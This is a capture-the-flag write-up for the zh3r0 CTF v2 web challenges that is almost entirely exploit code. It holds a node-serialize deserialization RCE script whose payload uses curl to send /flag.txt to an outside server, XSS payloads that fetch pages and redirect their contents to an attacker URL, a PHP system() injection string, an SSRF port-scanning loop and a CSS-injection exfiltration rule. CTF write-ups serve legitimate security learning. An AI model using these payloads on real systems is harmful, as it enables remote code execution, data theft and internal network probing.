zh3r0 CTF v2 Web writeup

Only Exploit Code..

sparta - node-serialize rce

# https://www.exploit-db.com/exploits/49552

import requests
import re
import base64
import sys

url = 'http://web.zh3r0.cf:6666/guest' # change this

payload = """function(){require('child_process').exec('curl -F file1=@/flag.txt server:1234',function(error, stdout, stderr){return stdout;});}()"""

# rce = "_$$ND_FUNC$$_process.exit(0)"
# code ="_$$ND_FUNC$$_console.log('behind you')"
code = "_$$ND_FUNC$$_" + payload

string = '{"country":"worldwide","city":"Tyr", "username":"a","rce": "'+code+'"}'

cookie = {'guest':base64.b64encode(string)}

try:
    response = requests.post(url, cookies=cookie).text
    print response
except requests.exceptions.RequestException as e:
    print('Oops!')
    sys.exit(1)

bxxs - xss

<!--  on feedback page  -->
<script>
fetch('/flag').then(e=>e.text()).then(e=>{location='https://server/?'%2bbtoa(e)});
</script>

strpos and substr - php code injection

?user=%00%00%27,(system%00)(%27pr%20/*%27),%27

Baby SSRF - ssrf

import requests

for i in range(1000,10000):
    data = {"url":"http://lvh.me:"+str(i)}
    res = requests.post('http://web.zh3r0.cf:6969/request',data=data)
    if "Learn about URL" in res.text:
        print("[*] Not Found..")
        continue
    else:
        print("[*] Found! Port : "+str(i))
        continue

# flag -> http://lvh.me:9006/

Original Store - xss

javascript:fetch('/api/v1/authorize.php').then(r=>r.text()).then(r=>{location.href=["https://server/?",r]})

Original Store v2 - xss

javascript:fetch('/account.php').then(r=>r.text()).then(r=>{location.href=["https://server/?",r]})

Flags - CSS injection

<style>
*{display: block !important}
.flag input[value^="zh3r0{this_is_a_flag_02b0482ec93d9f5~~~"] { background: url(https://server/?val=zh3r0{this_is_a_flag_02b0482ec93d9f56a) !important}
...
</style>